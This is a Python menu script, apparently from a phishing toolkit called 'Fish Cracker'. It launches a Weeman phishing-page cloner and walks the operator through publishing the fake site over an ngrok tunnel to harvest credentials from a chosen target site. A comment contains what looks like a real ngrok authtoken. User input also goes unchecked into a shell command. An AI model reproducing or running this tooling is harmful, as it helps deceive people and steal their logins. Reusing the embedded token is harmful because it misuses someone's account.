import os,sys
def main():
    os.system('logo.py')
    print ("              ------------------------------------------------")
    print ("             (                  Social Attack                 )")
    print ("              ------------------------------------------------\n\n\n")
    print ("\n\n 1) Start\n")
    print (" 2) Wan Mode\n")
    print (" 3) Back\n\n\n")
    s = raw_input(" Select Mode of Hack: ")
    if s == '1':
        os.system('weeman.bat')
    elif s == '2':
        os.system('cls')
        print ("\n\n Visit this link == ngrok.com \n")
        raw_input(" Press Enter To Continue")
        print ("\n Create an account and Login\n")
        raw_input(" Press Enter To Continue")
        e = raw_input("\n Now enter your Tunnel authtoken code: ")
        print ("\n Your Authtoken is: " + e)
        raw_input("\n Press Enter To Continue")
        os.system("ngrok authtoken " + e)
        #my 7JQK4evdvSts6s4fnnrWL_5fCkqXei8PGY3LNhnyBB8
        print ("\n You have Successfully configure your Ngrok\n")
        raw_input("\n Press Enter To Continue")
        print ("\n Now open a new CMD as Administrator\n")
        raw_input("\n Press Enter To Continue")
        print ("\n now locate the Fish Cracker directory in CMD\n")
        raw_input("\n Press Enter To Continue")
        print ("\n now type: ngrok http 80")
        print (" and now hit enter\n")
        raw_input("\n Press Enter To Continue")
        print ("\n now copy the Forwarding link or choose between http and https\n")
        raw_input("\n Press Enter To Continue")
        print ("\n now open a new cmd again\n")
        raw_input("\n Press Enter To Continue")
        print ("\n now locate the fishcracker directory\n")
        raw_input("\n Press Enter To Continue")
        print ("\n now type " + "fc.py" + " and hit enter\n")
        raw_input("\n Press Enter To Continue")
        print ("\n now go to Social Engineering and start the program")
        raw_input("\n Press Enter To Continue")
        print ("\n now Follow this command:\n")
        print (" set url http://yourtargetsite.com")
        print (" set port 80")
        print (" set action_url http://yourtargetsite.com")
        print (" run")
        raw_input(" Press any key to continue ")
        os.system("fc.py")
        
    elif s == '3':
        os.system("fc.py")
    else:
        print (' Invalid Command!')
        main()

main()
